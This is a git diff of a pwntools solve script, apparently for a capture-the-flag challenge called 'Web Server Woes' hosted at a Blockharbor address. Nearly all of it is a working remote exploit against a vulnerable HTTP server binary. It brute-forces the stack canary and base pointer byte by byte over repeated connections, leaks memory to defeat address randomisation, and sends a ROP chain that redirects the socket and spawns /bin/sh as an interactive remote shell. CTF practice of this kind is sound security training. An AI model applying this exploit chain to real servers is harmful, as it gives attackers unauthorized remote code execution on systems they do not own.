web server woes solved

Blockharbor/pwn/Web Server Woes/solve.py

@@ -1,4 +1,12 @@
+import time
 from pwn import *
+from subprocess import check_output
+def get_pid(name):
+    return int(check_output(["pidof",name]))
+
+context.log_level = "warn"
+HOST = "celsius.blockharbor.io"
+PORT = 55132
 
 elf = ELF(os.getcwd() + "/web")
 
@@ -6,20 +14,112 @@ gs = '''
 unset env LINES
 unset env COLUMNS
 set follow-fork-mode child
-br *handle_conn+64
+br *handle_conn+631
+# br *main+420
 continue
 '''
 
 def start():
     if args.GDB:
-        return gdb.debug([elf.path], gs=gs)
+        return gdb.debug([elf.path], gs)
     else:
         return process([elf.path])
 
-io = start()
-sender = remote("localhost", 5000)
+# io = start()
+# io.recvuntil(b'Web Server listening on PORT\n')
+sender = remote(HOST, PORT)
 
-sender.send(cyclic(2000))
+can_bytes = []
 
+for j in range(16):
+    i = 0
+    while True:
+        # time.sleep(0.2)
+        # io.timeout(0.1)
+        print(i,j,can_bytes)
+        payload = b"GET /" + b" HTTP/1.1" + cyclic(1018) + b"".join([p8(x) for x in can_bytes]) + i.to_bytes()
+        try:
+            sender.send(payload)
+            ret = sender.recvuntil(b"Not found!\n")
+            can_bytes.append(i)
+            # print(i)
+            break
+        except:
+            i += 1
+            i %= 0x100
+            sender.close()
+            sender = remote(HOST, PORT)
+            continue
+
+
+base_ptr = can_bytes[-8:]
+base_ptr.reverse()
+base_ptr = int("".join(["{:02x}".format(x) for x in base_ptr]), 16)
+
+canary = can_bytes[:8]
+canary.reverse()
+canary = int("".join(["{:02x}".format(x) for x in canary]), 16)
+
+sender.close()
+rev_can_bytes = can_bytes.copy()
+rev_can_bytes.reverse()
+print(can_bytes, " ".join([hex(x)[2:] for x in rev_can_bytes]))
+sender = remote(HOST, PORT)
+print(p64(base_ptr), hex(base_ptr))
+print(p64(canary), hex(canary))
+# payload = b"GET /" + b" HTTP/1.1" + cyclic(1018) + b"".join([p8(x) for x in can_bytes]) + p8(0xb4) #+ b"AAAAAAAA" #+ cyclic(cyclic_find('caaa'))
+payload = b"GET / HTTP/1.1"
+payload += b"AAAAAAAA"
+payload += p64(4)           # sock_fd
+payload += p64(base_ptr-0x41a-0x80)      # ptr to write (-0x41a-0x80) points to somewhere in stack to leak a lot libc
+payload += cyclic(1032-len(payload))
+payload += p64(canary) + p64(base_ptr-0x41a) + p8(0xa9) # 0x41a offset to directly after HTTP/1.1 with $rbp-0x30
+sender.send(payload)
+leak = sender.recvall(timeout=2)
+# ret = sender.recvuntil(b"Not found!\n")
+# print(ret)
+
+libc_heap_base = int.from_bytes(leak[10:18][::-1])-0xce0
+http404str = int.from_bytes(leak[18:26][::-1])
+rodata_base = int.from_bytes(leak[18:26][::-1])-0x30
+code_base = rodata_base-0x1000
+sender.close()
+# gdb.attach(get_pid("./web"), gs)
+sender = remote(HOST, PORT)
+syscall = code_base + 0x00000000000041c
+pop_rax = code_base + 0x00000000000045c
+pop_rdi = code_base + 0x000000000000983
+pop_rsi_r15 = code_base + 0x00000000981
+pop_rdx = code_base + 0x000000000000414
+pop_rsp = code_base + 0x97d
+
+payload = b"GET /bin/sh\x00HTTP/1.1"
+
+payload += cyclic(cyclic_find('aava')) # padding to rop chain
+payload += p64(0)*3                     # pop rsi also pops r13-15
+#dup2(0,4)
+payload += p64(pop_rax) + p64(33)
+payload += p64(pop_rdi) + p64(4)
+payload += p64(pop_rsi_r15) + p64(0) + p64(0)
+payload += p64(syscall)
+#dup2(1,4)
+payload += p64(pop_rax) + p64(33)
+payload += p64(pop_rdi) + p64(4)
+payload += p64(pop_rsi_r15) + p64(1) + p64(0)
+payload += p64(syscall)
+# system(/bin/sh)
+payload += p64(pop_rax) + p64(59)
+payload += p64(pop_rdi) + p64(base_ptr-1116)
+payload += p64(pop_rsi_r15) + p64(0) + p64(0)
+payload += p64(pop_rdx) + p64(0)
+payload += p64(syscall)
+
+payload += cyclic(1032-len(payload)) # padding to end of buf
+payload += p64(canary) + p64(base_ptr)
+payload += p64(pop_rsp) + p64(base_ptr-1018)
+
+sender.send(payload)
 sender.interactive()
-io.interactive()
+# ret = sender.recvall(timeout=2)
+# print(ret)
+pass